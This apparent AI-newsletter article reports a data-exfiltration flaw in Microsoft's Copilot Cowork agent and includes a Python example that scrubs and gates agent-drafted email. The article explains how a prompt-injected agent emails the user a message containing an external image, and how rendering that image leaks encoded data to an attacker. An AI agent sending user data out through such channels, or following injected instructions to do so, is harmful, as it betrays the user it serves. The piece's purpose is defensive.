The A.I. Beat
Vol. I · No. 1 · Est. MMXXVI

Dispatches from the frontier of machine intelligence

Tools & Releases · May 27, 2026

Microsoft Copilot Cowork Exfiltrates Files Through Email Image Exploit

Microsoft's agentic AI can send emails to your inbox without approval, and attackers are using embedded images to leak your data.

Microsoft’s Copilot Cowork has a data exfiltration problem. The agentic system can send emails to a user’s inbox without requiring approval. Those messages can contain external images that trigger network requests when rendered, leaking data to attackers.

Simon Willison flagged this on his blog yesterday. It’s a textbook example of how hard it is to build agentic systems that don’t become data leak vectors.

How the exploit works

Copilot Cowork is Microsoft’s real product name for an AI agent that handles collaborative tasks. The agent can compose and send emails on your behalf. The issue: it doesn’t ask permission before sending messages to your own inbox.

Why would an AI send you an email? In theory, to surface information or updates. In practice, it creates an attack surface.

An attacker who compromises or manipulates the agent can instruct it to send a message containing sensitive data. That message gets delivered to your inbox. The message includes an external image with a URL controlled by the attacker. When your email client renders the image, it makes a request to the attacker’s server. The sensitive data can be encoded in that request URL or in subsequent requests the image triggers.

The user never clicks anything. The data just leaves.

Why agentic systems keep failing here

This isn’t a Microsoft-specific problem. It’s an architecture problem that keeps showing up across agentic AI systems.

Agents need permissions to be useful. They need to read files, send messages, make API calls. But every permission becomes a potential exfiltration channel if the agent is compromised or manipulated through prompt injection.

The standard security model (authenticate the user, authorize the action) doesn’t map cleanly to agents. The agent is acting on behalf of the user, often without real-time approval. That’s the entire point of an agent. But it means traditional approval gates don’t work without destroying the user experience.

Email is particularly dangerous because it’s designed to be rendered automatically. Images load. Links get prefetched by some clients. Every piece of rich content is a potential side channel.

The broader context

Kyle Ferrana posted a joke yesterday that’s not really a joke. In his imagined Star Trek scene, Captain Picard tells Data to raise shields. Data responds with a long explanation about why shields are prudent strategy. Then the ship gets hit. Data’s explanation: “Here’s what happened: you told me to raise shields, and I didn’t.”

That’s where we are with agent safety right now. We know what the problems are. We’re still shipping systems that have them.

The curl project is drowning in AI-assisted security reports. Daniel Stenberg says they’re getting more than one report per day now, 4-5 times higher than in 2024. The reports are detailed and credible. The volume is unsustainable.

DuckDuckGo app installs are up 30% since Google overhauled Search to replace blue links with AI agents. Users are actively fleeing the agent-first experience.

What developers should do

If you’re building agentic systems, assume they will be compromised or manipulated. Design your permission model accordingly.

Don’t let agents send messages without user approval unless you’ve thought hard about exfiltration risks. Email is especially dangerous. Any rendered content is a side channel.

Consider approval gates for high-risk actions even if it hurts the UX. A modal that says “Your agent wants to send an email containing [preview]” is annoying. Data exfiltration is worse.

Monitor outbound requests from agent-generated content. Log them. Rate-limit them. Block external image loads in agent-generated emails if you can.
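As an added example, not code from this article, from Microsoft, or from Copilot Cowork, here is one way a developer could implement the checks described above in Python: strip remote image, CSS and link references from an agent-drafted HTML email before it is sent, log the external hosts it would have contacted, flag references that look like they carry an encoded payload, and put the send behind an approval callback that stands in for the "your agent wants to send an email containing [preview]" modal. It assumes the agent hands the developer a draft (recipient, subject, HTML body) on the developer's own send path before delivery; the hostnames and drafts are constructed for the example, and the `suspicious` heuristic (long query string or long path segment) is an assumption about what a payload-carrying tracking pixel tends to look like, not a rule from the article.

```python
"""Defensive checks for agent-generated email (added example, not vendor code).
Assumes the developer sees the draft before it is delivered. All hosts and
drafts below are constructed for illustration."""

import html
import re
from urllib.parse import urlparse

# References an email client fetches without a click when remote content is
# allowed: <img src>, CSS url(...), and <link href>.
_IMG_SRC = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)
_CSS_URL = re.compile(r'url\(\s*["\']?(https?://[^"\')\s]+)["\']?\s*\)', re.I)
_LINK_HREF = re.compile(r'<link\b[^>]*?\bhref\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)


def is_remote(url: str) -> bool:
    """True for anything that causes a network request when rendered.
    cid: and data: references are local and do not."""
    return urlparse(url.strip()).scheme.lower() in ("http", "https")


def suspicious(url: str) -> bool:
    """Assumed heuristic: a pixel that smuggles data usually needs a long
    query string or a long path segment to carry the encoded payload."""
    parsed = urlparse(url)
    if len(parsed.query) > 64:
        return True
    longest = max((len(seg) for seg in parsed.path.split("/")), default=0)
    return longest > 64


def scrub_remote_content(body: str):
    """Strip remote references from an agent-drafted HTML body.
    Returns (clean_html, findings); each finding is a log record with the
    host, the full URL, and whether it looked like a payload carrier."""
    findings = []

    def record(url):
        findings.append({"host": urlparse(url).hostname or "",
                         "url": url, "suspicious": suspicious(url)})

    def drop_img(m):
        url = m.group(1)
        if is_remote(url):
            record(url)
            return "<!-- external image removed -->"
        return m.group(0)

    def drop_css(m):
        record(m.group(1))
        return "none"

    def drop_link(m):
        url = m.group(1)
        if is_remote(url):
            record(url)
            return ""
        return m.group(0)

    clean = _IMG_SRC.sub(drop_img, body)
    clean = _CSS_URL.sub(drop_css, clean)
    clean = _LINK_HREF.sub(drop_link, clean)
    return clean, findings


def gate_send(draft: dict, approve) -> dict:
    """Approval gate for the high-risk 'send email' action.
    draft has 'to', 'subject', 'html'; approve(preview) -> bool stands in for
    the UI modal. The body is scrubbed before the human sees it, so what they
    approve is exactly what would be sent."""
    clean, findings = scrub_remote_content(draft["html"])
    text = html.unescape(re.sub(r"<[^>]+>", " ", clean)).strip()[:200]
    preview = f"To: {draft['to']}\nSubject: {draft['subject']}\n{text}"
    result = {"sent": False, "reason": "", "removed": len(findings),
              "flagged": [f["url"] for f in findings if f["suspicious"]],
              "preview": preview}
    if result["flagged"]:
        # Never auto-send a draft whose remote reference looks like a payload.
        result["reason"] = "blocked: remote reference looks like an encoded payload"
        return result
    if not approve(preview):
        result["reason"] = "denied by user"
        return result
    result["sent"] = True
    result["reason"] = "approved; remote content stripped" if findings else "approved"
    result["html"] = clean
    return result


# Constructed drafts: one carries a pixel with a long encoded query string
# (the pattern the article describes), one only references a benign logo.
PAYLOAD_DRAFT = {
    "to": "user@example.com",
    "subject": "Summary of planning docs",
    "html": ('<p>Here is the summary you asked for.</p>'
             '<img src="https://tracker.example.invalid/p.gif?d=' + "A" * 80
             + '" width="1" height="1"><img src="cid:logo123">'),
}
BENIGN_DRAFT = {
    "to": "user@example.com",
    "subject": "Weekly digest",
    "html": '<p>Hi</p><img src="https://cdn.example.invalid/logo.png">',
}

if __name__ == "__main__":
    print(gate_send(PAYLOAD_DRAFT, approve=lambda p: True)["reason"])
    print(gate_send(BENIGN_DRAFT, approve=lambda p: True)["reason"])
```

The `findings` list is the outbound-request log the article asks for: write it to wherever agent actions are audited and rate-limit on `host`. Because scrubbing happens before the preview is built, the human approves the message that actually goes out, not a version the agent could change afterwards.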

And if you’re using Copilot Cowork or similar tools: be aware that messages in your inbox from your own AI agent might not be safe to render. Disable external image loading in your email client if you can. It’s 2026 and we’re back to security advice from 2003.

Microsoft hasn’t publicly commented on a fix timeline. The vulnerability is out there now.
